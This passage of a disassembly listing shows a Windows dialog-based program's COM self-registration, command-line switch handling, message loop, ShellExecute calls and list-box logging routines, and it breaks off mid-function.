; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405430 proc near ; DATA XREF: .rdata:0040F5B4�o
jmp sub_405440
sub_405430 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405440 proc near ; CODE XREF: sub_405430�j
var_948 = byte ptr -948h
var_538 = word ptr -538h
var_536 = word ptr -536h
var_120 = byte ptr -120h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 948h
push ebx
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
mov [ebp+var_14], offset off_40F528
mov [ebp+var_10], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
jz short loc_405488
mov eax, [esi]
cmp eax, edi
jz short loc_405488
jmp short loc_405470
; ---------------------------------------------------------------------------
align 10h
loc_405470: ; CODE XREF: sub_405440+2B�j
; sub_405440+46�j
mov ecx, [esi+4]
push ecx
push eax
lea edx, [ebp+var_14]
push edx
call sub_403CA0
mov eax, [esi+8]
add esi, 8
cmp eax, edi
jnz short loc_405470
loc_405488: ; CODE XREF: sub_405440+23�j
; sub_405440+29�j
mov ecx, [ebp+arg_0]
mov eax, [ecx]
lea edx, [ebp+var_14]
push edx
call dword ptr [eax+14h]
mov esi, eax
cmp esi, edi
jl loc_4056BC
call off_412040
push 104h
mov ebx, eax
mov eax, dword_41256C
lea ecx, [ebp+var_120]
push ecx
push eax
mov [ebp+var_18], ebx
mov [ebp+arg_C], edi
mov [ebp+var_1C], eax
call ds:dword_40F0A4 ; GetModuleFileNameA
cmp eax, edi
jnz short loc_4054D7
call sub_4013E0
mov esi, eax
jmp loc_4056BC
; ---------------------------------------------------------------------------
loc_4054D7: ; CODE XREF: sub_405440+89�j
cmp eax, 104h
jnz short loc_405502
lea ecx, [ebp+arg_C]
call sub_401C60
lea ecx, [ebp+var_14]
call sub_4024D0
mov eax, 8007007Ah
lea esp, [ebp-954h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_405502: ; CODE XREF: sub_405440+9C�j
lea edx, [ebp+var_120]
push edx
call ds:dword_40F084 ; lstrlen
mov esi, eax
inc esi
lea edi, [esi+esi]
cmp edi, 400h
ja short loc_40553B
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_40553B
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_405544
; ---------------------------------------------------------------------------
loc_40553B: ; CODE XREF: sub_405440+DB�j
; sub_405440+E8�j
push edi
lea ecx, [ebp+arg_C]
call sub_4022E0
loc_405544: ; CODE XREF: sub_405440+F9�j
push ebx
push esi
lea ecx, [ebp+var_120]
push ecx
push eax
call sub_401200
test eax, eax
mov [ebp+arg_0], eax
jz loc_405665
push eax
lea edx, [ebp+var_948]
push edx
call sub_401490
mov esi, [ebp+var_1C]
add esp, 8
test esi, esi
jz short loc_405593
push 0
call ds:dword_40F0D0 ; GetModuleHandleA
cmp esi, eax
jz short loc_405593
lea eax, [ebp+var_948]
push eax
push offset aModule ; "Module"
lea ecx, [ebp+var_14]
push ecx
jmp short loc_4055E4
; ---------------------------------------------------------------------------
loc_405593: ; CODE XREF: sub_405440+133�j
; sub_405440+13F�j
lea edx, [ebp+var_948]
push edx
lea eax, [ebp+var_536]
mov esi, 22h
push eax
mov [ebp+var_538], si
call sub_401280
add esp, 8
lea ecx, [ebp+var_538]
push ecx
call ds:dword_40F040 ; lstrlenW
lea edx, [ebp+var_538]
push edx
mov [ebp+eax*2+var_538], si
mov [ebp+eax*2+var_536], 0
push offset aModule ; "Module"
lea eax, [ebp+var_14]
push eax
loc_4055E4: ; CODE XREF: sub_405440+151�j
call sub_403CA0
mov esi, eax
test esi, esi
jl loc_4056B4
lea ecx, [ebp+var_948]
push ecx
push offset aModule_raw ; "Module_Raw"
lea edx, [ebp+var_14]
push edx
call sub_403CA0
mov esi, eax
test esi, esi
jl loc_4056B4
mov ebx, [ebp+arg_4]
test ebx, ebx
jz short loc_405665
push ebx
call ds:dword_40F084 ; lstrlen
mov esi, eax
inc esi
lea edi, [esi+esi]
cmp edi, 400h
ja short loc_40564C
push edi
call sub_4010B0
add esp, 4
test al, al
jz short loc_40564C
mov eax, edi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_405655
; ---------------------------------------------------------------------------
loc_40564C: ; CODE XREF: sub_405440+1EC�j
; sub_405440+1F9�j
push edi
lea ecx, [ebp+arg_C]
call sub_4022E0
loc_405655: ; CODE XREF: sub_405440+20A�j
mov ecx, [ebp+var_18]
push ecx
push esi
push ebx
push eax
call sub_401200
test eax, eax
jnz short loc_405689
loc_405665: ; CODE XREF: sub_405440+118�j
; sub_405440+1D7�j
lea ecx, [ebp+arg_C]
call sub_401C60
lea ecx, [ebp+var_14]
call sub_4024D0
mov eax, 8007000Eh
lea esp, [ebp-954h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_405689: ; CODE XREF: sub_405440+223�j
mov ecx, [ebp+arg_8]
test ecx, ecx
push offset aRegistry ; "REGISTRY"
push eax
jz short loc_4056A5
mov edx, [ebp+arg_0]
push edx
lea eax, [ebp+var_14]
push eax
call sub_4056E0
jmp short loc_4056B2
; ---------------------------------------------------------------------------
loc_4056A5: ; CODE XREF: sub_405440+254�j
mov ecx, [ebp+arg_0]
push ecx
lea edx, [ebp+var_14]
push edx
call sub_405800
loc_4056B2: ; CODE XREF: sub_405440+263�j
mov esi, eax
loc_4056B4: ; CODE XREF: sub_405440+1AD�j
; sub_405440+1CC�j
lea ecx, [ebp+arg_C]
call sub_401C60
loc_4056BC: ; CODE XREF: sub_405440+58�j
; sub_405440+92�j
lea ecx, [ebp+var_14]
call sub_4024D0
mov eax, esi
lea esp, [ebp-954h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_405440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056E0 proc near ; CODE XREF: sub_405440+25E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
call off_412040
mov edi, [ebp+arg_8]
test edi, edi
mov [ebp+var_8], eax
mov [ebp+var_4], 0
jz loc_4057EA
mov eax, [ebp+arg_C]
test eax, eax
jz loc_4057EA
mov ebx, ds:dword_40F040
push edi
call ebx ; lstrlenW
lea esi, [eax+eax+2]
cmp esi, 400h
jg short loc_405742
push esi
call sub_4010B0
add esp, 4
test al, al
jz short loc_405742
mov eax, esi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_40574B
; ---------------------------------------------------------------------------
loc_405742: ; CODE XREF: sub_4056E0+42�j
; sub_4056E0+4F�j
push esi
lea ecx, [ebp+var_4]
call sub_4022E0
loc_40574B: ; CODE XREF: sub_4056E0+60�j
mov ecx, [ebp+var_8]
push ecx
push esi
push edi
push eax
call sub_401240
mov edx, [ebp+arg_C]
push edx
mov edi, eax
call ebx ; lstrlenW
lea esi, [eax+eax+2]
cmp esi, 400h
jg short loc_405789
push esi
call sub_4010B0
add esp, 4
test al, al
jz short loc_405789
mov eax, esi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_405792
; ---------------------------------------------------------------------------
loc_405789: ; CODE XREF: sub_4056E0+89�j
; sub_4056E0+96�j
push esi
lea ecx, [ebp+var_4]
call sub_4022E0
loc_405792: ; CODE XREF: sub_4056E0+A7�j
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_C]
push ecx
push esi
push edx
push eax
call sub_401240
test edi, edi
jz short loc_4057D1
test eax, eax
jnz short loc_4057D1
mov ecx, [ebp+arg_0]
push 1
push eax
mov eax, [ebp+arg_4]
push edi
push eax
call sub_404CD0
lea ecx, [ebp+var_4]
mov esi, eax
call sub_401C60
mov eax, esi
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4057D1: ; CODE XREF: sub_4056E0+C3�j
; sub_4056E0+C7�j
lea ecx, [ebp+var_4]
call sub_401C60
mov eax, 8007000Eh
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4057EA: ; CODE XREF: sub_4056E0+1E�j
; sub_4056E0+29�j
mov eax, 80070057h
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_4056E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405800 proc near ; CODE XREF: sub_405440+26D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
call off_412040
mov edi, [ebp+arg_8]
test edi, edi
mov [ebp+var_8], eax
mov [ebp+var_4], 0
jz loc_40590A
mov eax, [ebp+arg_C]
test eax, eax
jz loc_40590A
mov ebx, ds:dword_40F040
push edi
call ebx ; lstrlenW
lea esi, [eax+eax+2]
cmp esi, 400h
jg short loc_405862
push esi
call sub_4010B0
add esp, 4
test al, al
jz short loc_405862
mov eax, esi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_40586B
; ---------------------------------------------------------------------------
loc_405862: ; CODE XREF: sub_405800+42�j
; sub_405800+4F�j
push esi
lea ecx, [ebp+var_4]
call sub_4022E0
loc_40586B: ; CODE XREF: sub_405800+60�j
mov ecx, [ebp+var_8]
push ecx
push esi
push edi
push eax
call sub_401240
mov edx, [ebp+arg_C]
push edx
mov edi, eax
call ebx ; lstrlenW
lea esi, [eax+eax+2]
cmp esi, 400h
jg short loc_4058A9
push esi
call sub_4010B0
add esp, 4
test al, al
jz short loc_4058A9
mov eax, esi
add eax, 3
and eax, 0FFFFFFFCh
call __alloca_probe
mov eax, esp
jmp short loc_4058B2
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: sub_405800+89�j
; sub_405800+96�j
push esi
lea ecx, [ebp+var_4]
call sub_4022E0
loc_4058B2: ; CODE XREF: sub_405800+A7�j
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_C]
push ecx
push esi
push edx
push eax
call sub_401240
test edi, edi
jz short loc_4058F1
test eax, eax
jz short loc_4058F1
mov ecx, [ebp+arg_0]
push 0
push eax
mov eax, [ebp+arg_4]
push edi
push eax
call sub_404CD0
lea ecx, [ebp+var_4]
mov esi, eax
call sub_401C60
mov eax, esi
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_4058F1: ; CODE XREF: sub_405800+C3�j
; sub_405800+C7�j
lea ecx, [ebp+var_4]
call sub_401C60
mov eax, 8007000Eh
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_40590A: ; CODE XREF: sub_405800+1E�j
; sub_405800+29�j
mov eax, 80070057h
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_405800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame thunk
sub_405920 proc near ; DATA XREF: .rdata:0040F5B0�o
jmp sub_4050C0
sub_405920 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
hInstance = dword ptr 4
hPrevInstance = dword ptr 8
lpCmdLine = dword ptr 0Ch
nShowCmd = dword ptr 10h
sub esp, 24h
push ebx
push ebp
push esi
push edi
call ds:dword_40F0D8 ; GetCommandLineA
push 0
mov ebp, eax
call ds:dword_40F278
mov edi, [esp+34h+hInstance]
push offset dword_40F338
push edi
push offset dword_4124E4
mov ecx, offset off_412070
call sub_401A80
call ds:dword_40F0AC ; GetCurrentThreadId
mov cl, ds:byte_40F6D2
mov dword_4120A0, eax
mov ax, ds:word_40F6D0
mov word ptr [esp+34h+var_24], ax
lea ebx, [esp+34h+var_24]
mov eax, ebp
mov byte ptr [esp+34h+var_24+2], cl
mov [esp+34h+var_20], 0
call sub_401060
mov esi, eax
test esi, esi
jz short loc_405A18
mov edi, ds:dword_40F088
nop
loc_4059A0: ; CODE XREF: WinMain(x,x,x,x)+97�j
push offset aUnregserver ; "UnregServer"
push esi
call edi ; lstrcmpi
test eax, eax
jz short loc_4059CB
push offset aRegserver ; "RegServer"
push esi
call edi ; lstrcmpi
test eax, eax
jz short loc_4059F2
lea ebx, [esp+34h+var_24]
mov eax, esi
call sub_401060
mov esi, eax
test esi, esi
jnz short loc_4059A0
jmp short loc_405A14
; ---------------------------------------------------------------------------
loc_4059CB: ; CODE XREF: WinMain(x,x,x,x)+7A�j
push 0
push 0
push 64h
push offset off_412070
call sub_4050C0
push 0
push 1
mov ecx, offset off_412070
call sub_4053B0
mov [esp+34h+var_20], eax
jmp loc_405B93
; ---------------------------------------------------------------------------
loc_4059F2: ; CODE XREF: WinMain(x,x,x,x)+86�j
push 0
push 1
push 64h
push offset off_412070
call sub_4050C0
push 0
push 1
mov ecx, offset off_412070
call sub_405320
mov [esp+34h+var_20], eax
loc_405A14: ; CODE XREF: WinMain(x,x,x,x)+99�j
mov edi, [esp+34h+hInstance]
loc_405A18: ; CODE XREF: WinMain(x,x,x,x)+67�j
push 0
push 0
push 0
push 0
call ds:dword_40F094 ; CreateEventA
test eax, eax
mov dword_4120A4, eax
jz short loc_405A4A
lea edx, [esp+34h+hInstance]
push edx
push 0
push offset off_412070
push offset loc_401D40
push 0
push 0
call ds:dword_40F090 ; CreateThread
loc_405A4A: ; CODE XREF: WinMain(x,x,x,x)+FD�j
push 1
push 4
mov ecx, offset off_412070
call sub_402210
mov al, ds:byte_40F7FB
test al, al
jz short loc_405A7D
mov eax, ebp
lea edx, [eax+1]
loc_405A66: ; CODE XREF: WinMain(x,x,x,x)+13B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405A66
sub eax, edx
cmp byte ptr [eax+ebp-1], 75h
jnz short loc_405A7D
mov eax, edi
call loc_4031B0
loc_405A7D: ; CODE XREF: WinMain(x,x,x,x)+12F�j
; WinMain(x,x,x,x)+144�j
call ds:dword_40F0D8 ; GetCommandLineA
push edi
call sub_403350
push 64h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
add esp, 8
test eax, eax
jz short loc_405AF5
push edi
mov ecx, eax
call sub_404850
test eax, eax
mov dword_412530, eax
jz loc_405B7E
call ds:dword_40F210 ; GetDesktopWindow
mov esi, eax
mov eax, dword_412530
push eax
add eax, 8
push eax
push offset dword_412044
call loc_402E50
mov eax, dword_412570
push 0
push offset loc_404B50
push esi
push 65h
push eax
call ds:dword_40F220 ; CreateDialogParamA
mov al, ds:byte_40F7F9
test al, al
jz short loc_405B01
mov ecx, dword_412530
mov edx, [ecx+4]
push 0
push edx
jmp short loc_405B0C
; ---------------------------------------------------------------------------
loc_405AF5: ; CODE XREF: WinMain(x,x,x,x)+165�j
mov dword_412530, 0
jmp short loc_405B7E
; ---------------------------------------------------------------------------
loc_405B01: ; CODE XREF: WinMain(x,x,x,x)+1B5�j
mov eax, dword_412530
mov ecx, [eax+4]
push 5
push ecx
loc_405B0C: ; CODE XREF: WinMain(x,x,x,x)+1C3�j
call ds:dword_40F228 ; ShowWindow
mov esi, ds:dword_40F214
push 0
push 0
push 0
lea edx, [esp+40h+var_1C]
push edx
call esi ; GetMessageA
test eax, eax
jz short loc_405B6D
mov edi, ds:dword_40F218
mov ebx, ds:dword_40F21C
jmp short loc_405B40
; ---------------------------------------------------------------------------
align 10h
loc_405B40: ; CODE XREF: WinMain(x,x,x,x)+205�j
; WinMain(x,x,x,x)+23B�j
mov ecx, dword_412530
mov edx, [ecx+4]
lea eax, [esp+34h+var_1C]
push eax
push edx
call edi ; IsDialogMessage
test eax, eax
jnz short loc_405B5C
lea eax, [esp+34h+var_1C]
push eax
call ebx ; DispatchMessageA
loc_405B5C: ; CODE XREF: WinMain(x,x,x,x)+223�j
push 0
push 0
push 0
lea ecx, [esp+40h+var_1C]
push ecx
call esi ; GetMessageA
test eax, eax
jnz short loc_405B40
loc_405B6D: ; CODE XREF: WinMain(x,x,x,x)+1F7�j
mov ecx, dword_412530
test ecx, ecx
jz short loc_405B7E
mov edx, [ecx]
push 1
call dword ptr [edx+4]
loc_405B7E: ; CODE XREF: WinMain(x,x,x,x)+176�j
; WinMain(x,x,x,x)+1CF�j ...
mov ecx, offset off_412070
call sub_4022A0
push 3E8h
call ds:dword_40F0D4 ; Sleep
loc_405B93: ; CODE XREF: WinMain(x,x,x,x)+BD�j
mov ecx, offset off_412070
call sub_402170
call ds:dword_40F274
mov eax, [esp+34h+var_20]
pop edi
pop esi
pop ebp
pop ebx
add esp, 24h
retn 10h
_WinMain@16 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405BC0 proc near ; CODE XREF: sub_408350+327�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push 1
push 0
push 0
push eax
push offset aOpen ; "open"
push 0
call ds:dword_40F1AC
cmp eax, 20h
setnbe al
retn 4
sub_405BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405BF0 proc near ; CODE XREF: sub_406390+6F�p
; sub_406390+89�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov eax, [esi+20h]
push 79h
push eax
mov ecx, edi
call sub_408FD0
mov ecx, [esi+20h]
push 66h
push ecx
push 1
mov ecx, edi
call sub_408E60
mov edx, [esi+20h]
push 67h
push edx
push 2
mov ecx, edi
call sub_408E60
mov eax, [esi+20h]
push 68h
push eax
push 1
mov ecx, edi
call sub_408EA0
mov ecx, [esi+20h]
push 69h
push ecx
push 2
mov ecx, edi
call sub_408EA0
push 0
mov ecx, edi
call sub_408FB0
pop edi
pop esi
retn 4
sub_405BF0 endp
; ---------------------------------------------------------------------------
align 10h
loc_405C50: ; DATA XREF: sub_407D40+4C�o
push esi
mov esi, [esp+8]
push edi
mov edi, [esp+10h]
cmp [edi+8], esi
jz short loc_405CAA
push 0FFFFFFE0h
push esi
call ds:dword_40F238 ; GetClassWord
cmp [edi+2], ax
jnz short loc_405CAA
push 0FFFFFFEBh
push esi
call ds:dword_40F204 ; GetWindowLongA
cmp [edi+4], eax
jnz short loc_405CAA
mov byte ptr [edi], 1
mov al, ds:byte_40F7F9
test al, al
jz short loc_405C8C
push 0
jmp short loc_405C8E
; ---------------------------------------------------------------------------
loc_405C8C: ; CODE XREF: .text:00405C86�j
push 5
loc_405C8E: ; CODE XREF: .text:00405C8A�j
push esi
call ds:dword_40F228 ; ShowWindow
push esi
call ds:dword_40F208 ; SetForegroundWindow
push esi
call ds:dword_40F20C ; SetFocus
pop edi
xor eax, eax
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_405CAA: ; CODE XREF: .text:00405C5D�j
; .text:00405C6C�j ...
pop edi
mov eax, 1
pop esi
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405CC0 proc near ; CODE XREF: sub_407D40+4A8�p
mov eax, [ecx+4]
push eax
call ds:dword_40F200 ; DestroyWindow
push 0
call ds:dword_40F1D8 ; PostQuitMessage
retn
sub_405CC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405CE0 proc near ; CODE XREF: sub_405D70+50�p
; sub_405D70+8E�p ...
arg_0 = dword ptr 4
mov eax, dword_412534
test eax, eax
push ebx
push esi
mov esi, ecx
jnz short loc_405D02
push 1400h ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
add esp, 4
mov dword_412534, eax
mov byte ptr [eax], 0
loc_405D02: ; CODE XREF: sub_405CE0+B�j
mov ebx, [esp+8+arg_0]
push eax
push ebx
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jz short loc_405D67
mov eax, [esi+4]
push edi
mov edi, ds:dword_40F1C4
push ebx
push 0
push 180h
push 0CCh
push eax
call edi ; SendDlgItemMessageA
mov ecx, [esi+4]
push 0
push 0
push 18Bh
push 0CCh
push ecx
call edi ; SendDlgItemMessageA
mov edx, [esi+4]
push 0
dec eax
push eax
push 186h
push 0CCh
push edx
call edi ; SendDlgItemMessageA
mov eax, dword_412534
push 1400h
push ebx
push eax
call ds:dword_40F09C ; lstrcpyn
pop edi
loc_405D67: ; CODE XREF: sub_405CE0+30�j
pop esi
pop ebx
retn 4
sub_405CE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405D70 proc near ; CODE XREF: sub_405F00+59�p
; sub_4065D0+39�p ...
var_800 = byte ptr -800h
var_400 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
sub esp, 800h
push esi
mov esi, [esp+804h+arg_0]
mov edx, [esi+20h]
push 400h
lea eax, [esp+808h+var_800]
push eax
push ecx
push edx
call ds:dword_40F1E4 ; LoadStringA
test eax, eax
jnz short loc_405DCD
mov eax, [esp+804h+arg_4]
push eax
lea ecx, [esp+808h+var_800]
push offset aResourceLdNotF ; "resource %ld not found"
push ecx
call ds:dword_40F1E0 ; wsprintfA
add esp, 0Ch
lea edx, [esp+804h+var_400]
push edx
mov ecx, esi
call sub_405CE0
pop esi
add esp, 800h
retn
; ---------------------------------------------------------------------------
loc_405DCD: ; CODE XREF: sub_405D70+29�j
cmp [esp+804h+arg_4], 12Bh
lea ecx, [esp+804h+var_400]
lea eax, [esp+804h+var_800]
jnz short loc_405E0B
mov edx, [esi+54h]
push edx
push eax
push ecx
call ds:dword_40F1E0 ; wsprintfA
add esp, 0Ch
lea edx, [esp+804h+var_400]
push edx
mov ecx, esi
call sub_405CE0
pop esi
add esp, 800h
retn
; ---------------------------------------------------------------------------
loc_405E0B: ; CODE XREF: sub_405D70+73�j
lea edx, [esp+804h+arg_8]
push edx
push eax
push ecx
call ds:dword_40F1DC ; wvsprintfA
lea edx, [esp+804h+var_400]
push edx
mov ecx, esi
call sub_405CE0
pop esi
add esp, 800h
retn
sub_405D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405E40 proc near ; CODE XREF: sub_4065D0+C2�p
; sub_408350+1FF�p ...
var_400 = byte ptr -400h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
sub esp, 400h
lea eax, [esp+400h+arg_8]
push eax
push ecx
lea edx, [esp+408h+var_400]
push edx
call ds:dword_40F1DC ; wvsprintfA
mov ecx, [esp+400h+arg_0]
lea eax, [esp+400h+var_400]
push eax
call sub_405CE0
add esp, 400h
retn
sub_405E40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405E80 proc near ; CODE XREF: sub_407D40+52C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
test eax, eax
jnz short loc_405E8D
xor al, al
retn 8
; ---------------------------------------------------------------------------
loc_405E8D: ; CODE XREF: sub_405E80+6�j
mov ecx, [ecx+4]
push eax
mov eax, [esp+4+arg_0]
push eax
push ecx
call ds:dword_40F1C8 ; SetDlgItemTextA
dec eax
neg eax
sbb al, al
inc al
retn 8
sub_405E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405EB0 proc near ; CODE XREF: sub_404890+90�p
var_4 = byte ptr -4
push ecx
push esi
mov esi, ecx
mov ecx, dword_41252C
test ecx, ecx
jz short loc_405EDF
lea eax, [esp+8+var_4]
push eax
call sub_409BC0
cmp eax, 2000h
jz short loc_405EF1
mov ecx, dword_41252C
push 0BB8h
call sub_4097C0
loc_405EDF: ; CODE XREF: sub_405EB0+C�j
mov ecx, [esi+4]
push ecx
call ds:dword_40F200 ; DestroyWindow
push 0
call ds:dword_40F1D8 ; PostQuitMessage
loc_405EF1: ; CODE XREF: sub_405EB0+1D�j
xor eax, eax
pop esi
pop ecx
retn 10h
sub_405EB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405F00 proc near ; CODE XREF: sub_404890+C0�p
var_200 = byte ptr -200h
sub esp, 200h
push esi
push edi
mov edi, ds:dword_40F1C4
push 0
push 0
push 147h
mov esi, ecx
mov eax, [esi+4]
push 0C9h
push eax
call edi ; SendDlgItemMessageA
mov edx, [esi+4]
lea ecx, [esp+208h+var_200]
push ecx
push eax
push 148h
push 0C9h
push edx
call edi ; SendDlgItemMessageA
mov ecx, dword_41252C
lea eax, [esp+208h+var_200]
push eax
call sub_4094D0
test eax, eax
jge short loc_405F8C
lea ecx, [esp+208h+var_200]
push ecx
push 1F4h
push esi
call sub_405D70
mov ecx, dword_41252C
add esp, 0Ch
call sub_4096C0
mov edx, [esi+4]
push eax
push 0
push 14Dh
push 0C9h
push edx
call edi ; SendDlgItemMessageA
pop edi
xor eax, eax
pop esi
add esp, 200h
retn 10h
; ---------------------------------------------------------------------------
loc_405F8C: ; CODE XREF: sub_405F00+4C�j
mov ecx, dword_41252C
push eax
call sub_409AD0
pop edi
xor eax, eax
pop esi
add esp, 200h
retn 10h
sub_405F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405FB0 proc near ; CODE XREF: sub_406200+2�p
; sub_407D40+19A�p ...
var_2C = dword ptr -2Ch
Memory = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_2 = byte ptr -2
arg_0 = dword ptr 4
sub esp, 2Ch
mov eax, [esp+2Ch+arg_0]
mov ecx, [ecx+20h]
push ebx
xor ebx, ebx
push eax
push ecx
lea ecx, [esp+38h+var_2C]
mov [esp+38h+var_2C], ebx
mov [esp+38h+Memory], ebx
mov [esp+38h+var_24], ebx
mov [esp+38h+var_20], bl
mov [esp+38h+var_2], bl
call sub_401DD0
cmp al, 1
jz short loc_406009
mov eax, [esp+30h+Memory]
cmp eax, ebx
jz short loc_405FF5
push eax ; Memory
call _free
add esp, 4
mov [esp+30h+Memory], ebx
loc_405FF5: ; CODE XREF: sub_405FB0+36�j
mov edx, [esp+30h+var_2C]
push edx
call ds:dword_40F194
xor al, al
pop ebx
add esp, 2Ch
retn 4
; ---------------------------------------------------------------------------
loc_406009: ; CODE XREF: sub_405FB0+2E�j
lea ecx, [esp+30h+var_2C]
call sub_409F60
push 1
push ebx
push ebx
push eax
push offset aOpen ; "open"
push ebx
call ds:dword_40F1AC
cmp eax, 20h
mov eax, [esp+30h+Memory]
setnbe byte ptr [esp+30h+arg_0]
cmp eax, ebx
jz short loc_406040
push eax ; Memory
call _free
add esp, 4
mov [esp+30h+Memory], ebx
loc_406040: ; CODE XREF: sub_405FB0+81�j
mov eax, [esp+30h+var_2C]
push eax
call ds:dword_40F194
mov al, byte ptr [esp+30h+arg_0]
pop ebx
add esp, 2Ch
retn 4
sub_405FB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406060 proc near ; CODE XREF: sub_406110+25�p
; sub_407D40+2B7�p ...
var_2C = dword ptr -2Ch
Memory = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_2 = byte ptr -2
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 2Ch
mov eax, [esp+2Ch+arg_4]
push esi
push edi
mov esi, ecx
mov ecx, [esi+20h]
push eax
xor edi, edi
push ecx
lea ecx, [esp+3Ch+var_2C]
mov [esp+3Ch+var_2C], edi
mov [esp+3Ch+Memory], edi
mov [esp+3Ch+var_24], edi
mov [esp+3Ch+var_20], 0
mov [esp+3Ch+var_2], 0
call sub_401DD0
cmp al, 1
jz short loc_4060BF
mov eax, [esp+34h+Memory]
cmp eax, edi
jz short loc_4060AA
push eax ; Memory
call _free
add esp, 4
mov [esp+34h+Memory], edi
loc_4060AA: ; CODE XREF: sub_406060+3B�j
mov edx, [esp+34h+var_2C]
push edx
call ds:dword_40F194
pop edi
xor al, al
pop esi
add esp, 2Ch
retn 8
; ---------------------------------------------------------------------------
loc_4060BF: ; CODE XREF: sub_406060+33�j
push ebx
lea ecx, [esp+38h+var_2C]
call sub_409F60
mov ecx, [esi+4]
push eax
mov eax, [esp+3Ch+arg_0]
push eax
push ecx
call ds:dword_40F1C8 ; SetDlgItemTextA
mov ebx, eax
mov eax, [esp+34h+var_24]
dec ebx
neg ebx
sbb bl, bl
inc bl
cmp eax, edi
jz short loc_4060F7
push eax ; Memory
call _free
add esp, 4
mov [esp+34h+var_24], edi
loc_4060F7: ; CODE XREF: sub_406060+88�j
